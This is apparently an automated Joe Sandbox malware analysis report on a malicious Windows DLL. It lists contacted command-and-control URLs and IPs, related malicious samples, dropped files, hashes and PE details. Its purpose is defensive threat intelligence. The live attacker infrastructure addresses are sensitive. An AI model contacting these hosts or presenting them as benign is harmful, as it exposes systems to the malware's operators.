https://45.79.33.48/	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://51.178.61.60/rLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs	rundll32.exe, 00000008.00000002.882575499.0000000000CDA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://45.79.33.48:8080/GEGDSODavaAMfbQXuktdlcgqQGPldhWooFcQtRsikthZVdhkisiiQD	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://177.72.80.14:7080/kst	rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.c	rundll32.exe, 00000008.00000003.478850691.0000000000DB5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://168.197.250.14:80/	rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528005
Start date:	24.11.2021
Start time:	16:54:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pYebrdRKvR (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@20/7@0/21
EGA Information:	Failed
HDC Information:	Successful, ratio: 75.2% (good quality ratio 65.7%) Quality average: 69% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 91% Number of executed functions: 62 Number of non-executed functions: 50
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 209.197.3.8, 20.54.110.249, 23.35.236.56 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:56:28	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
196.44.98.190	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	pPX9DaPVYj.dll	Get hash	malicious	Browse	78.47.204.80
	wUKXjICs5f.dll	Get hash	malicious	Browse	78.47.204.80
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	78.47.204.80
	qrb6jVwzoe.dll	Get hash	malicious	Browse	78.47.204.80
	copy_tt_inv_10192ne.exe	Get hash	malicious	Browse	49.12.42.56
	FACTURAS.exe	Get hash	malicious	Browse	116.202.203.61
	wE3YzRd1IZ.exe	Get hash	malicious	Browse	135.181.163.109
	wCkjCMnGrO	Get hash	malicious	Browse	116.203.73.1
	79GRrdea5l.exe	Get hash	malicious	Browse	159.69.123.221
	MtCsSK9TK2.exe	Get hash	malicious	Browse	95.216.4.252
	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Get hash	malicious	Browse	5.9.164.117
	C54CA1DF46D817348C9BDF18F857459D7CA05C51F7F30.exe	Get hash	malicious	Browse	135.181.129.119
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	5.9.162.45
	j0UcwcqjvM.exe	Get hash	malicious	Browse	5.9.162.45
	0K31jgS20G.exe	Get hash	malicious	Browse	5.9.162.45
	vAsfZhw32P.exe	Get hash	malicious	Browse	5.9.162.45
	YwZpT3p5Rh.msi	Get hash	malicious	Browse	88.99.32.114
	FhP4JYCU7J.exe	Get hash	malicious	Browse	5.9.162.45
	ugeLMlEROB.exe	Get hash	malicious	Browse	116.202.14.219
	FhP4JYCU7J.exe	Get hash	malicious	Browse	5.9.162.45
AS-CHOOPAUS	pPX9DaPVYj.dll	Get hash	malicious	Browse	66.42.57.149
	wUKXjICs5f.dll	Get hash	malicious	Browse	66.42.57.149
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	66.42.57.149
	qrb6jVwzoe.dll	Get hash	malicious	Browse	66.42.57.149
	AWB_NO_9284730932.exe	Get hash	malicious	Browse	45.32.28.45
	arm6-20211124-0649	Get hash	malicious	Browse	44.168.42.223
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	bomba.arm	Get hash	malicious	Browse	44.168.169.161
	44E401AAF0B52528AA033257C1A1B8A09A2B10EDF26ED.exe	Get hash	malicious	Browse	149.28.253.196
	77012C024869BA2639B54B959FAB1E10EBAAF8EBB9BFC.exe	Get hash	malicious	Browse	149.28.253.196
	WQRrng5aiw.exe	Get hash	malicious	Browse	149.28.253.196
	WQRrng5aiw.exe	Get hash	malicious	Browse	149.28.253.196
	5giHvDqMaL	Get hash	malicious	Browse	45.63.53.236
	22BA4262D93379DE524029DAFC7528E431E56A22CB293.exe	Get hash	malicious	Browse	149.28.253.196
	6PZ6S2YGPB	Get hash	malicious	Browse	45.63.53.204
	kq5Of3SOMZ.exe	Get hash	malicious	Browse	149.28.253.196
	QABYgAqa5Z.exe	Get hash	malicious	Browse	149.28.253.196
	ZrAv540yA4.exe	Get hash	malicious	Browse	216.128.137.31
EcobandGH	pPX9DaPVYj.dll	Get hash	malicious	Browse	196.44.98.190
	wUKXjICs5f.dll	Get hash	malicious	Browse	196.44.98.190
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	196.44.98.190
	qrb6jVwzoe.dll	Get hash	malicious	Browse	196.44.98.190
	1711.doc	Get hash	malicious	Browse	196.44.98.190
	n6J7QJs4bk.dll	Get hash	malicious	Browse	196.44.109.73
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	196.44.98.190
	wNjqkrm8pH.dll	Get hash	malicious	Browse	196.44.98.190
	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	pPX9DaPVYj.dll	Get hash	malicious	Browse	51.178.61.60
	wUKXjICs5f.dll	Get hash	malicious	Browse	51.178.61.60
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	51.178.61.60
	qrb6jVwzoe.dll	Get hash	malicious	Browse	51.178.61.60
	ReadMe[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	cTplVWrqRR.dll	Get hash	malicious	Browse	51.178.61.60
	NErdgsNsKR.vbs	Get hash	malicious	Browse	51.178.61.60
	F.A.Q[2021.11.22_12-15].vbs	Get hash	malicious	Browse	51.178.61.60
	Q1KL4ickDw.dll	Get hash	malicious	Browse	51.178.61.60
	yZGYbaJ.dll	Get hash	malicious	Browse	51.178.61.60
	1711.doc	Get hash	malicious	Browse	51.178.61.60
	cs.exe	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	0MGLPJiSa5.dll	Get hash	malicious	Browse	51.178.61.60
	bbyGAgHI9O.dll	Get hash	malicious	Browse	51.178.61.60
	Vs6ZDk0LMC.dll	Get hash	malicious	Browse	51.178.61.60
	sTh52oTZDh.dll	Get hash	malicious	Browse	51.178.61.60
	loveTubeLike.dll	Get hash	malicious	Browse	51.178.61.60
	2SR3psYDHQ.js	Get hash	malicious	Browse	51.178.61.60
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24937883611665626
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4p:BJiRdwfu2SRU4p
MD5:	702AF954D4EF11D4F5DB2EC68C91FBF6
SHA1:	2ED89AB1CBFD678062621AA2F6FF402BEC03D4C0
SHA-256:	CADD95EABFFB496A4927D6CC935FCE02A8A07301FF5AD1C4768D76949BF17683
SHA-512:	74426B31F46AEA7DD12A96EB7D1493A0B47E0E8407FE0C251B52C656BA542C6AAA600057F07435D09EE782D29A5F9AE68D83079EAF068DC1B3613730C8942A8A
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x7ccc75ac, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2505134410665448
Encrypted:	false
SSDEEP:	384:WHz+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:WHASB2nSB2RSjlK/+mLesOj1J2
MD5:	497DB6EBFC8FEA018C2466F4A6A36093
SHA1:	E7025D6C75282AEE05DDADB886909EDA0E67B210
SHA-256:	F8DAC24AEBFD44E801361824A75A356693F274685DCA869988A68DA81AF436DE
SHA-512:	05114F24518D625FCCFF4083916285594E25278B5C1520BDE24CD915263D5475872A4AEF0FCC028C85170C52F79B4A95A57D9BFBF253FADDF5F1C2E3B5904CFD
Malicious:	false
Preview:	\|.u.... ................e.f.3...w........................).....3;...y..)8...yS.h.(.....3;...y....)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................3;...y.....................3;...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07259979872370396
Encrypted:	false
SSDEEP:	3:k7vMdZjTL/llXB4+TP7+YtFQlUiL/llall3Vkttlmlnl:krMbXlI+3x3ulA3
MD5:	484B9E7B5EFDA3148543BA647B248A44
SHA1:	4483A82D4AAE8DD9BB80267840AAB7948C88351D
SHA-256:	53D20C1034813E1559E4667B528C040364F2C1710B0DA651F60E31A2AD476238
SHA-512:	C5E89A454439D1AE967C7503B9FCD9174E4DC6284EC4FF9EC538A148FBBF16B82AB14620467A0C06D0338B105CF330DCBF9B7937A900C8FEA256F86A43896A82
Malicious:	false
Preview:	7........................................3...w..)8...yS.3;...y..........3;...y..3;...y....U.3;...yoy...................3;...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1122616792999316
Encrypted:	false
SSDEEP:	6:kKRzk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:5z9kPlE99SNxAhUeYlUSA/t
MD5:	C66736E92765D6954E0E4373830E0002
SHA1:	C0D3BBFE9F4262FDD513096F8B3ED26D05576F54
SHA-256:	4509EC8C66427F16B4C0E64999CD756E3361C37EE35D5B7E485057AF1079F15A
SHA-512:	9D3A1AF6990711BA20A90831BFDF0533D1DE72740764D916D74E1137FEFF1D26257E084F63465F9CA092610E735516E13FECFDCAEC3390F07B87B2C76877EDA7
Malicious:	false
Preview:	p...... .........N.D....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.428778908504156
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20%
File name:	pYebrdRKvR.dll
File size:	425984
MD5:	3102132775b47d2ff1c40a2b5293ba60
SHA1:	8d54c54e8eff10bf087236af120367620b61a622
SHA256:	5c4d9d71040604f2a6cd8fa3e69a3af1f79590348729cd0d90abbb8ea51a05a9
SHA512:	ca05549daa48c7de1c5cb1daf2eb041f5807bc0376fa6f79b94f65e93eaf3d00d53119689e9b22dce0eae6e3fc12f2b9cd58de29d827927f343bdcbb385b6d59
SSDEEP:	6144:1ACzUEcRRKxe0DUAldEzpL/E0sepO8+wM:1lxemHQt/E0sLvd
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....A.a...........!.....T...P.......................................................H....@..........................S..P..

File Icon


Icon Hash:	64da98ecd2ceead4

Static PE Info

General
Entrypoint:	0x1001cab0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x619E410C [Wed Nov 24 13:41:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ef559179cbfc08fc57c1e24c241992ea

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FF00CA1BBA7h
call 00007FF00CA1BC07h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FF00CA1BA58h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
sub esp, 14h
and dword ptr [ebp-0Ch], 00000000h
lea eax, dword ptr [ebp-0Ch]
and dword ptr [ebp-08h], 00000000h
push eax
call dword ptr [1002806Ch]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [10028068h]
xor dword ptr [ebp-04h], eax
call dword ptr [10028050h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [10028064h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov ecx, dword ptr [1004609Ch]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FF00CA1BBA6h
test esi, ecx
jne 00007FF00CA1BBC8h
call 00007FF00CA1BB39h
mov ecx, eax
cmp ecx, edi
jne 00007FF00CA1BBA9h
mov ecx, BB40E64Fh
jmp 00007FF00CA1BBB0h
test esi, ecx
jne 00007FF00CA1BBACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [1004609Ch], ecx
not ecx
pop edi
mov dword ptr [10046098h], ecx
pop esi
ret
push 1005E118h
call dword ptr [10028070h]
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x45300	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x45350	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x61000	0xb7b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d000	0x10f0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x44be0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x44c18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x28000	0x124	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.flat	0x1000	0x446	0x600	False	0.643229166667	data	5.67523607022	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text	0x2000	0x252cb	0x25400	False	0.536086933725	data	5.88986915783	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x28000	0x1d9da	0x1da00	False	0.494923523207	data	5.10028459369	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x46000	0x1aab0	0x17e00	False	0.51547161322	data	4.96852629791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x61000	0xb7b8	0xb800	False	0.177564538043	data	3.89759299523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6d000	0x10f0	0x1200	False	0.782335069444	data	6.41113333729	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x614b0	0xb13	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
RT_ICON	0x61fc8	0xea8	data	Russian	Russia
RT_ICON	0x62e70	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	Russian	Russia
RT_ICON	0x63718	0x568	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_ICON	0x63c80	0xc4a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
